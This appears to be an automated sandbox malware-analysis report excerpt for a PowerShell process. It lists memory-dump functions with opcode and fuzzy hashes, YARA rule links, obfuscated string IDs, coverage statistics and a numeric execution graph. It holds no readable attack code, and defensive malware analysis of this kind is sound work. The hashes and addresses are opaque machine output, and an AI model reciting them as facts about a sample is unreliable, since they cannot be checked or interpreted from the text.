                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d392807c76217dbce39d290efc1564608cdb205ce6fdc1c820516e12072c972
                    • Instruction ID: 7d5956861d4f5ced9649327edade1c30ae3bd7d1d4b671430a2e55ac3eaee1e2
                    • Opcode Fuzzy Hash: 3d392807c76217dbce39d290efc1564608cdb205ce6fdc1c820516e12072c972
                    • Instruction Fuzzy Hash: D3412534E00300CFDB68AF34A942B7A7BB2AF95249F4891A6D9409F391DB35DC45C7A5
                    Function 02A59AD9 Relevance: .1, Instructions: 119COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6d485860b5fdd154d418ad01e10af0169d588007a3703d795b5715c8b5eb8901
                    • Instruction ID: 845b582edec5f0ac44758f1cc94498378cf06adbbdb65fcb942699dcc80074de
                    • Opcode Fuzzy Hash: 6d485860b5fdd154d418ad01e10af0169d588007a3703d795b5715c8b5eb8901
                    • Instruction Fuzzy Hash: B9416E31A00215CFDB15DB64C998AAE7BB6FF89714F184468E802EF7A0DF759C81CB90
                    Function 06E49016 Relevance: .1, Instructions: 102COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3604ae278ef57ad52e789e9b3be99dda5b09c1e08bd3ebc6bfb0f8a897ab3a50
                    • Instruction ID: 84db6c97bd76b030ba08f3903262fff112742c7fbd2d50708256790febf677d1
                    • Opcode Fuzzy Hash: 3604ae278ef57ad52e789e9b3be99dda5b09c1e08bd3ebc6bfb0f8a897ab3a50
                    • Instruction Fuzzy Hash: 3B317374B002149BE704A774C865BAF7BA7AFC4745F14C024EA056F392CF7AAC458B95
                    Function 02A5C7B8 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b8e9833133c9747cabd1ce2a423ea50fede9945fe16081b7e2dba0a13eadf81
                    • Instruction ID: 98aaf9e10bccab13d20c1a71d23fe70e9cd9dea6458e2d38cd659f8c9b0d4438
                    • Opcode Fuzzy Hash: 8b8e9833133c9747cabd1ce2a423ea50fede9945fe16081b7e2dba0a13eadf81
                    • Instruction Fuzzy Hash: B8311D34A002288FCB15DB64C9547EEB7B2BF49319F1144EAD909AB355CF359E81CF91
                    Function 02A539D8 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 046922d40e20a55cd59528014fffac3d52e6f69fc649cf65d6ea2d85534c582b
                    • Instruction ID: fd6b5f91c4670246d08180ff86c1ef9bdf5931b7efdbf9a13adc831427582809
                    • Opcode Fuzzy Hash: 046922d40e20a55cd59528014fffac3d52e6f69fc649cf65d6ea2d85534c582b
                    • Instruction Fuzzy Hash: 2A2178B4A052599FCB01CF5CD8909ABBBB5FF89340B04819AE909EB352C735ED45CBA0
                    Function 02A545B1 Relevance: .1, Instructions: 67COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad0491a25cd03ad4749379b4deda484366d935ec39558cc3e301267dac07b0cb
                    • Instruction ID: addb85ec81e2e24fa72bd1894e6c4b6aa738f37581291972af7c56e219205e1b
                    • Opcode Fuzzy Hash: ad0491a25cd03ad4749379b4deda484366d935ec39558cc3e301267dac07b0cb
                    • Instruction Fuzzy Hash: BF210774A006159FCB05CF58C4809AAFBF1FF4C310B158555D909EB761C735EC81CBA0
                    Function 02A539C8 Relevance: .1, Instructions: 58COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227709950.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_2a50000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 893af3208689a25044e48bfbff421144f2c3084a38067b112399be3e558febb5
                    • Instruction ID: f7e1cbcf3576fbedd82bbc27a05e1665a22a7e0e1100133416ab2917cacad68a
                    • Opcode Fuzzy Hash: 893af3208689a25044e48bfbff421144f2c3084a38067b112399be3e558febb5
                    • Instruction Fuzzy Hash: 0D21F974E042599FCB00DF98D490AAEFBB1FF89310B148199E909AB352C731ED51CBA1
                    Function 026BD01D Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227298192.00000000026BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026BD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_26bd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5291d166c8fc8f0969e8ff688827c1a9a4d25ce829e143c30867641ced24f7f4
                    • Instruction ID: b34b1e3b2501033aefc5e2a0f6b002d6963194e71ee67370ccfff4b6bae5eef1
                    • Opcode Fuzzy Hash: 5291d166c8fc8f0969e8ff688827c1a9a4d25ce829e143c30867641ced24f7f4
                    • Instruction Fuzzy Hash: 4401A771409384AAE7254F15CC84BA6BFD8DF55325F18C419ED4D0F246C7799882C7B1
                    Function 026BD006 Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227298192.00000000026BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026BD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_26bd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b0f576b45e12e616bf050abc18e411b8ad7e821209a819d0daac52a0d967e27f
                    • Instruction ID: 492289cfa8d7b4db5d93d3a90fbe1f4bdc99b737e4d155b6b7d51775519e6d85
                    • Opcode Fuzzy Hash: b0f576b45e12e616bf050abc18e411b8ad7e821209a819d0daac52a0d967e27f
                    • Instruction Fuzzy Hash: A501407100E3C09EE7138B258D94B52BFB4DF53224F1980CBD8888F2A7C3695845C772

                    Non-executed Functions

                    Function 026BD430 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2227298192.00000000026BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026BD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_26bd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b15a736eb65d72ca0f7fff4e07d03f0aeab508d4eab91e708517a121d3220294
                    • Instruction ID: 00fc0cd29c52b1701742701396a2869516bbf2b5ee8dbe0384e459bc0e1a764b
                    • Opcode Fuzzy Hash: b15a736eb65d72ca0f7fff4e07d03f0aeab508d4eab91e708517a121d3220294
                    • Instruction Fuzzy Hash: 49210672504204DFDB1ADF14D9C0B66BF65FF98324F24C569D9090E346C336E496C7A1
                    Function 06E40BB0 Relevance: 18.0, Strings: 14, Instructions: 492COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q
                    • API String ID: 0-888303901
                    • Opcode ID: 1bb2b4b99b05f9d7ac059716fe99fa772d36b0fb2ea92e6c21e75dfece9f360a
                    • Instruction ID: 4885a87bd0ebfa5f7c78576669b7a744873d3a31f415a9cd344b79be54e64fe5
                    • Opcode Fuzzy Hash: 1bb2b4b99b05f9d7ac059716fe99fa772d36b0fb2ea92e6c21e75dfece9f360a
                    • Instruction Fuzzy Hash: E902C235F00314DFDB68AF68D845AAABBE2BF88315F148469EA059F351CB31DC85CB91
                    Function 06E4CAB8 Relevance: 14.1, Strings: 11, Instructions: 368COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-2779274079
                    • Opcode ID: 377d744d6c848cc1f696c1380f649e653bd1e12174cbd7434a8387949f269c15
                    • Instruction ID: 28cf545dd37fad0d3ae1984d83f03a9cfa252abb08389187a95ab5235ace259e
                    • Opcode Fuzzy Hash: 377d744d6c848cc1f696c1380f649e653bd1e12174cbd7434a8387949f269c15
                    • Instruction Fuzzy Hash: 8DC10731F06318DFDB68AE39E4446AA7BE1AB84B15F34D86AD8158F244DB31C885CBD1
                    Function 06E43658 Relevance: 14.0, Strings: 11, Instructions: 300COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q$V$$^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-1040829863
                    • Opcode ID: 08ae05a78f357fabd82d0955174d296fb412cbe91ffd71f617044d82a0b3d1bd
                    • Instruction ID: 25c58630f035679c493d2f1167890da30f7d4e5b0931f443b31adca69dddb0fa
                    • Opcode Fuzzy Hash: 08ae05a78f357fabd82d0955174d296fb412cbe91ffd71f617044d82a0b3d1bd
                    • Instruction Fuzzy Hash: 63A15731F08305CFDBA46E3AA80477ABBE2AF85655B14846AD545CF381DF32C885C7A1
                    Function 06E453A0 Relevance: 10.5, Strings: 8, Instructions: 496COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-3732357466
                    • Opcode ID: 506755400b9595a4168ef038120d39077ae08d0f8d20662148d18606f65f9e50
                    • Instruction ID: b562a2e5f75b3a6c3fe0540697afe585f0b1a6d4f0129c08adc2258a54777daf
                    • Opcode Fuzzy Hash: 506755400b9595a4168ef038120d39077ae08d0f8d20662148d18606f65f9e50
                    • Instruction Fuzzy Hash: 38F17731F04344DFDB68AF79E8446BABBE2AF85255B2488BAD805CF251DF31C845C7A1
                    Function 06E41D28 Relevance: 9.2, Strings: 7, Instructions: 494COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q
                    • API String ID: 0-75002515
                    • Opcode ID: 1b1ce9c87ff19d634e188af2d5c3ea54ca4efdbb3f23d53041ffef1cad60a654
                    • Instruction ID: f8edcd3511a5b494d57d8a65b9fc1e00e66c74745e1d0b02c760987216e49674
                    • Opcode Fuzzy Hash: 1b1ce9c87ff19d634e188af2d5c3ea54ca4efdbb3f23d53041ffef1cad60a654
                    • Instruction Fuzzy Hash: 39F17835F043048FDB55AA79A8106BABBE2AFC5315F24846BE905CB241DF32C985C7A1
                    Function 06E4A6E0 Relevance: 9.2, Strings: 7, Instructions: 479COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                    • API String ID: 0-1608119003
                    • Opcode ID: 34f7225962425742d15c5ba937d9e9c50453bfa4e5a2a27dbe03bfbdd778828a
                    • Instruction ID: 296c7f5fd25bc2f4b80241440ef45c8c44a903842d1313c483c9009ad25d63a9
                    • Opcode Fuzzy Hash: 34f7225962425742d15c5ba937d9e9c50453bfa4e5a2a27dbe03bfbdd778828a
                    • Instruction Fuzzy Hash: 47F15536B043148FDB65AB3CA4052AABBE2AFC4325F14847AD946CF389DB32DC41C791
                    Function 06E4DE3C Relevance: 9.0, Strings: 7, Instructions: 205COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                    • API String ID: 0-1710924510
                    • Opcode ID: 49cbfaafa6e3ec5a7711dbc622d5e0db38bd7bad168575856ee4430080383bbd
                    • Instruction ID: 184386a65325f402c0a167c6eb3b7e03b617db8f372a2c00d2d9ed9fc8b19a65
                    • Opcode Fuzzy Hash: 49cbfaafa6e3ec5a7711dbc622d5e0db38bd7bad168575856ee4430080383bbd
                    • Instruction Fuzzy Hash: AD71A330E013049FDB64EF28E944BAAB7E2BF84714F29945AE805AB391DB31DD45CB91
                    Function 06E4DE50 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                    • API String ID: 0-1710924510
                    • Opcode ID: 93bb2282898a703cb347407bc08b0b1419c5b402d4ccfce6aefcc834009a80d7
                    • Instruction ID: b33b90236a720ee9dab44bfbe1af2efed95322e6e9015d023f38eb5980430bdd
                    • Opcode Fuzzy Hash: 93bb2282898a703cb347407bc08b0b1419c5b402d4ccfce6aefcc834009a80d7
                    • Instruction Fuzzy Hash: 5961B430E01304DFDB64EF28E944BAAB7E2BF84714F29945AE805AB391DB31DD45CB91
                    Function 06E4DAFB Relevance: 8.9, Strings: 7, Instructions: 155COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                    • API String ID: 0-2461640029
                    • Opcode ID: 90be069b29bb6482eb9020adc3ec5d29123f663caa3ac85df350713e2bc734eb
                    • Instruction ID: 427df2335b07e0a644be30e40864b716db181854f28e539f3867f06c72bc9a47
                    • Opcode Fuzzy Hash: 90be069b29bb6482eb9020adc3ec5d29123f663caa3ac85df350713e2bc734eb
                    • Instruction Fuzzy Hash: DD51E130E00304DFDBA8AE24ED44BA673A2EF80715F14A56AE8049F298C771DC80CF91
                    Function 06E41450 Relevance: 6.5, Strings: 5, Instructions: 292COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q
                    • API String ID: 0-3457661241
                    • Opcode ID: 691d957589da38560383f414f780ce2d6b33f9840694ad54514e9917a8aaf6fc
                    • Instruction ID: 7dde68e2c3d2e5a49e9ac3d4f14c7902e702243a872c50175970abcbeb9bd436
                    • Opcode Fuzzy Hash: 691d957589da38560383f414f780ce2d6b33f9840694ad54514e9917a8aaf6fc
                    • Instruction Fuzzy Hash: 52A12931F143548FCF64AB78A8057FABBE29F86315F18C0AAD5068F251DE31C885C7A1
                    Function 06E4E508 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                    • API String ID: 0-3997570045
                    • Opcode ID: 7e71a905fa7c6360f9ff73ee66fcaf5539c00a3fb98705f5ccfa18a8a951107d
                    • Instruction ID: 7f0b75ab0a1479421b3ee9c275a7b253558578d6258e949bfa618c3604d55455
                    • Opcode Fuzzy Hash: 7e71a905fa7c6360f9ff73ee66fcaf5539c00a3fb98705f5ccfa18a8a951107d
                    • Instruction Fuzzy Hash: 8B61C330E14305DFEBA8AF35E5487AA77A2BF84315F18A495E9015F2D1D774DC80CBA1
                    Function 06E4D955 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                    • API String ID: 0-3272787073
                    • Opcode ID: 33131eee4038b6f598fce9708038a9eb9f61ea0921b7a2cad311aa15fd7ef336
                    • Instruction ID: 09b7770000e304d7001599ef9d28ea729a9c6ee1f68ebf92444b31702d74e185
                    • Opcode Fuzzy Hash: 33131eee4038b6f598fce9708038a9eb9f61ea0921b7a2cad311aa15fd7ef336
                    • Instruction Fuzzy Hash: 41317732F08305CFDBA96E39AC203B6B7E1AF85615728987BC945CB241CE36C481C391
                    Function 06E42C8B Relevance: 6.4, Strings: 5, Instructions: 111COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                    • API String ID: 0-3997570045
                    • Opcode ID: 658a5ed2e0ccb93197d291ae260c2ce6478e136ab80ed428596104da1947be63
                    • Instruction ID: 0682abda3e64f4765c1f83bbce4b36033e40686e521c6e1eb5332544727a288f
                    • Opcode Fuzzy Hash: 658a5ed2e0ccb93197d291ae260c2ce6478e136ab80ed428596104da1947be63
                    • Instruction Fuzzy Hash: A641B231E00304EFEBA9AE35E484BA5B7E1AF44714F149069FA155F295CB32DA84CFA1
                    Function 06E42C90 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                    • API String ID: 0-3997570045
                    • Opcode ID: 0c885ea2db8e4eebe4b9d4cd1cad3ecb35acb03f2ec9059129a1b417d86a18c4
                    • Instruction ID: 9817329e853cd29223d6e5a38afdf451298545db9b8a453a9ecd10078847b698
                    • Opcode Fuzzy Hash: 0c885ea2db8e4eebe4b9d4cd1cad3ecb35acb03f2ec9059129a1b417d86a18c4
                    • Instruction Fuzzy Hash: AC31D331E00304DFEBA9AE35E484BA5B7E1AF44714F149069FA155F294CB32DA80CF91
                    Function 06E412E8 Relevance: 6.3, Strings: 5, Instructions: 60COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$$^q$$^q
                    • API String ID: 0-2831958266
                    • Opcode ID: 31b4a9476a796d442fd785f148a6407106072574e40a99942f7b507ad036e636
                    • Instruction ID: 628a1ce536b781f4bffddf96c0628e7b79d8e4f623071d340d670e45d1fa8961
                    • Opcode Fuzzy Hash: 31b4a9476a796d442fd785f148a6407106072574e40a99942f7b507ad036e636
                    • Instruction Fuzzy Hash: 74110821B093550FCB6E223D2C286E96FE64FC2A5531A04DBD045DF79ACE144CC683A6
                    Function 06E4CF88 Relevance: 5.5, Strings: 4, Instructions: 471COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (o^q$(o^q$(o^q$(o^q
                    • API String ID: 0-1978863864
                    • Opcode ID: ba6f732deb309a72fe536c015f3a056618f4affa0a32a11cef5454cd8dff4896
                    • Instruction ID: 5a9a43e68088c569761bd226b0af93bf3169baf7488bd0f3dc62ebe18722b10b
                    • Opcode Fuzzy Hash: ba6f732deb309a72fe536c015f3a056618f4affa0a32a11cef5454cd8dff4896
                    • Instruction Fuzzy Hash: 76F15531B04304CFDB64AF78EC44BAABBA2FF85315F1484AAE9158B291DF35D845C7A1
                    Function 06E40148 Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$4'^q$4'^q
                    • API String ID: 0-1420252700
                    • Opcode ID: bb452f34dba262406f4d487afe6945332877ce581a975568f27a6bb1e84dece4
                    • Instruction ID: 3570116e0c48e98fa11c134fd2c2b7f8ca3d8b90819d0f4dbc13dddf03f7a17d
                    • Opcode Fuzzy Hash: bb452f34dba262406f4d487afe6945332877ce581a975568f27a6bb1e84dece4
                    • Instruction Fuzzy Hash: 99912735F043148FCB94AF78A4446AABBE2AFC5315B1484BADA05DB352DF31CC85C7A2
                    Function 06E40B90 Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'^q$4'^q$tP^q$tP^q
                    • API String ID: 0-3859475322
                    • Opcode ID: 9aa0528ab7a3b11182d36eb7eeb3dceaf7ffdfc7bf49f29570c1e657b4316dd7
                    • Instruction ID: 34cb9cc9cfcd1840e9c7cf9140372deea11ef1872cedd6a5ac6bd206434bb989
                    • Opcode Fuzzy Hash: 9aa0528ab7a3b11182d36eb7eeb3dceaf7ffdfc7bf49f29570c1e657b4316dd7
                    • Instruction Fuzzy Hash: EE91C231E01314DFDB64EF64E984AA9BBB2BF48314F1990A9EA05AF351C731DC85CB91
                    Function 06E423A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2233888088.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $^q$$^q$$^q$$^q
                    • API String ID: 0-2125118731
                    • Opcode ID: 36ca44070f85a1eccb941277948435b8ad0af9e55cc210ce821183af0d07ef87
                    • Instruction ID: ef53c4dcd93550ee3acc3510cdf96574a53b0a6c1b351a4c2f0da406b9c029c2
                    • Opcode Fuzzy Hash: 36ca44070f85a1eccb941277948435b8ad0af9e55cc210ce821183af0d07ef87
                    • Instruction Fuzzy Hash: 32217C317003159FDBA83579A845B377AE69FC4759F20843AFA0ACB381CD35D942C3A1

                    Execution Graph

                    Execution Coverage:2.5%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:2%
                    Total number of Nodes:1648
                    Total number of Limit Nodes:5
                    execution_graph 7761 22795bff 7769 22795d5c 7761->7769 7764 22795c13 7765 22795b7a __dosmaperr 20 API calls 7766 22795c1b 7765->7766 7767 22795c28 7766->7767 7768 22795c2b 11 API calls 7766->7768 7768->7764 7770 22795c45 _abort 5 API calls 7769->7770 7771 22795d83 7770->7771 7772 22795d9b TlsAlloc 7771->7772 7773 22795d8c 7771->7773 7772->7773 7774 22792ada _ValidateLocalCookies 5 API calls 7773->7774 7775 22795c09 7774->7775 7775->7764 7775->7765 6229 22799e71 6230 22799e95 6229->6230 6231 22799eae 6230->6231 6233 2279ac6b __startOneArgErrorHandling 6230->6233 6232 22799ef8 6231->6232 6237 2279aa53 6231->6237 6236 2279acad __startOneArgErrorHandling 6233->6236 6247 2279b2f0 6233->6247 6238 2279aa70 RtlDecodePointer 6237->6238 6240 2279aa80 6237->6240 6238->6240 6239 22792ada _ValidateLocalCookies 5 API calls 6242 2279ac67 6239->6242 6241 2279ab0d 6240->6241 6243 2279ab02 6240->6243 6245 2279aab7 6240->6245 6241->6243 6244 22796368 __dosmaperr 20 API calls 6241->6244 6242->6232 6243->6239 6244->6243 6245->6243 6246 22796368 __dosmaperr 20 API calls 6245->6246 6246->6243 6248 2279b329 __startOneArgErrorHandling 6247->6248 6250 2279b350 __startOneArgErrorHandling 6248->6250 6258 2279b5c1 6248->6258 6251 2279b393 6250->6251 6252 2279b36e 6250->6252 6271 2279b8b2 6251->6271 6262 2279b8e1 6252->6262 6255 2279b38e __startOneArgErrorHandling 6256 22792ada _ValidateLocalCookies 5 API calls 6255->6256 6257 2279b3b7 6256->6257 6257->6236 6259 2279b5ec __raise_exc 6258->6259 6260 2279b7e5 RaiseException 6259->6260 6261 2279b7fd 6260->6261 6261->6250 6263 2279b8f0 6262->6263 6264 2279b90f __startOneArgErrorHandling 6263->6264 6265 2279b964 __startOneArgErrorHandling 6263->6265 6278 227978a3 6264->6278 6266 2279b8b2 __startOneArgErrorHandling 20 API calls 6265->6266 6270 2279b95d 6266->6270 6269 2279b8b2 __startOneArgErrorHandling 20 API calls 6269->6270 6270->6255 6272 2279b8bf 6271->6272 6273 2279b8d4 6271->6273 6274 2279b8d9 6272->6274 6276 22796368 __dosmaperr 20 API calls 6272->6276 6275 22796368 __dosmaperr 20 API calls 6273->6275 6274->6255 6275->6274 6277 2279b8cc 6276->6277 6277->6255 6279 227978cb 6278->6279 6280 22792ada _ValidateLocalCookies 5 API calls 6279->6280 6281 227978e8 6280->6281 6281->6269 6281->6270 7261 22793370 7272 22793330 7261->7272 7273 2279334f 7272->7273 7274 22793342 7272->7274 7275 22792ada _ValidateLocalCookies 5 API calls 7274->7275 7275->7273 6282 2279ac6b 6283 2279ac84 __startOneArgErrorHandling 6282->6283 6284 2279b2f0 21 API calls 6283->6284 6285 2279acad __startOneArgErrorHandling 6283->6285 6284->6285 7776 227985eb 7780 2279853a 7776->7780 7777 2279854f 